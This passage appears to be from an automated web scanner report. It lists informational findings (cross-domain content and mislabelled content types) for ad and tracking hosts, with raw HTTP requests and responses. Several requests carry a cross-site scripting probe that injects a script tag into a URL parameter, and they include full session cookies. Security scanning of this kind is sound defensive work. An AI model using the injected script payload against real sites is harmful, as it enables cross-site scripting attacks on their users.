16.7. http://c14.zedo.com/OzoDB/cutils/R53_7_7/jsc/1545/zpu.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c14.zedo.com
Path:   /OzoDB/cutils/R53_7_7/jsc/1545/zpu.html

Request

GET /OzoDB/cutils/R53_7_7/jsc/1545/zpu.html?n=1545;f=1;z=2-110 HTTP/1.1
Host: c14.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/html
Date: Mon, 12 Sep 2011 12:48:57 GMT
Edge-Control: dca=esi
Expires: Wed, 12 Oct 2011 12:48:57 GMT
Last-Modified: Fri, 09 Sep 2011 07:01:44 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ECS (sjo/5238)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1340

<html>
<body>
<SCRIPT LANGUAGE="JavaScript">
var zcc7=new Array();var zcd9=0;
function zCF5(zcw1){
if(zcd9<1){
var zct3=''+window.location.search;var zcv4=new Array();var zcd3=zct3.indexOf(';l=')+1;
i
...[SNIP]...

16.8. http://d3.zedo.com/jsc/d3/ff2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545 HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://c14.zedo.com/OzoDB/cutils/R53_7_7/jsc/1545/zpu.html?n=1545;f=1;z=2-110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=0

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 12:13:46 GMT
ETag: "3a9d70f-a35-4aa4dd85cb280"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2613
Cache-Control: max-age=93628
Expires: Tue, 13 Sep 2011 14:49:41 GMT
Date: Mon, 12 Sep 2011 12:49:13 GMT
Connection: close

<!-- Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

16.9. http://p.raasnet.com/partners/universal/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...

16.10. http://sana.newsinc.com/sana.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /sana.html

Request

GET /sana.html?wid=4106&uut=A5859D26-18DA-46D0-B4A1-83A199A664121315849734506&furl=http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html&purl=&ssid=ndn&anid=10557&ltype=1&plid=994&rdm=12037031 HTTP/1.1
Host: sana.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "b36bf549d471e0b15dc89899e8b573f7:1307641380"
Last-Modified: Thu, 09 Jun 2011 17:42:59 GMT
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/html
Date: Mon, 12 Sep 2011 12:49:29 GMT
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head></head>
<body></body>
<html
...[SNIP]...

16.11. http://view.atdmt.com/ADO/iview/278612752/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ADO/iview/278612752/direct

Request

GET /ADO/iview/278612752/direct;wi.1;hi.1/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:38 GMT
Connection: close
Content-Length: 406

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/171946551/278612752/direct;wi.1;hi.1/01" onclick="(new Image).src='http://t.atdmt.com'"><img src="http://spe.atdmt.com/images/
...[SNIP]...

16.12. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/1829737

Request

GET /CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close
Content-Length: 7028

<html><head><title>ATT_Potter_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...

16.13. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/4245069

Request

GET /CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: AA002=1311365777-4076437; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 13:06:09 GMT
Connection: close
Content-Length: 7033

<html><head><title>ATT_NoImage_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...

16.14. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:49:03 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750%7cMUI
...[SNIP]...

16.15. http://virtualgoods.bigdoor.com/media/html/gambit/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://virtualgoods.bigdoor.com
Path:   /media/html/gambit/about.html

Request

GET /media/html/gambit/about.html HTTP/1.1
Host: virtualgoods.bigdoor.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: yFKV3YfhUDS8nRre4AHspZaPSNjE7J8Gz0l5UjvN6jucANGQzzGYu82tefq2SkjO
x-amz-request-id: 8193771D30318D39
Date: Mon, 25 Jul 2011 08:08:20 GMT
x-amz-meta-s3cmd-attrs: uid:1006/gname:brian/uname:bryan/gid:1005/mode:33188/mtime:1308160800/atime:1308160841/ctime:1308160841
Last-Modified: Wed, 15 Jun 2011 18:00:43 GMT
ETag: "b91541932222aea74715fb286dc8f109"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2267
Server: AmazonS3
Age: 21254
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: e43af31c5ccb8504bffb3e154fc5faed9a19dcc322144df48be112a586c9a137e6eef8d6be72799d
Via: 1.0 a1c5ac3682794e4a6d3935bd273efd27.cloudfront.net:11180 (CloudFront), 1.0 5e67960ca17a2cc60393e082766a7dca.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
       <title>About Bigdoor</title>
       <style type="text/css">
           body {
               ma
...[SNIP]...

16.16. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Request

GET /modules/facebook_connect/xd_receiver.php HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=225065900
Expires:
Pragma:
Vary:
Vary: Accept-Encoding
Content-type: text/html
Date: Mon, 12 Sep 2011 13:03:52 GMT
Server: lighttpd/1.4.26
Content-Length: 636


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...

17. Content type incorrectly stated
There are 31 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


17.1. http://4qinvite.4q.iperceptions.com/1.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /1.aspx?sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.digitaldollhouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE03
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Mon, 12 Sep 2011 12:49:56 GMT
Content-Length: 79

var dm = document.domain;document.cookie='IPE_S_5432=5432;Path=/;domain=' + dm;

17.2. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:
Content-type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

17.3. http://adserv.impactengine.com/www/kr/36/ui/b8/objembed.html/@@1315499800@@

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserv.impactengine.com
Path:   /www/kr/36/ui/b8/objembed.html/@@1315499800@@

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /www/kr/36/ui/b8/objembed.html/@@1315499800@@ HTTP/1.1
Host: adserv.impactengine.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sun, 11 Sep 2011 21:15:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 09 Sep 2011 13:57:03 GMT
Accept-Ranges: bytes
Content-Length: 19920
Content-Type: text/html; charset=UTF-8
Age: 55992
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: d97735d9aab9d7e1a623012702321f3bbd9e7221898108ec7a6b6b196247cac649f7f372e2b2cf96
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

var eventString;
var activityViewerReady;
//
var mouseEvent                         = null;
var eventLogContainer                 = null;
var offsetPositionX                     = 0;
var offsetPositionY                     = 0;
var showLogFooter                     =
...[SNIP]...

17.4. http://amch.questionmarket.com/adsc/d879999/4/880134/randm.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d879999/4/880134/randm.js

Issue detail

The response contains the following Content-type statement:
Content-Type: application/javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d879999/4/880134/randm.js HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 04:09:28 GMT
ETag: "e02507ca-1-4aa978bc33a0f"
Accept-Ranges: bytes
Content-Length: 1
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Cache-Control: public, max-age=1800
Content-Type: application/javascript

;

17.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d907755/101/908678/adscout.php

Issue detail

The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adsc/d907755/101/908678/adscout.php?ord=4246944 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
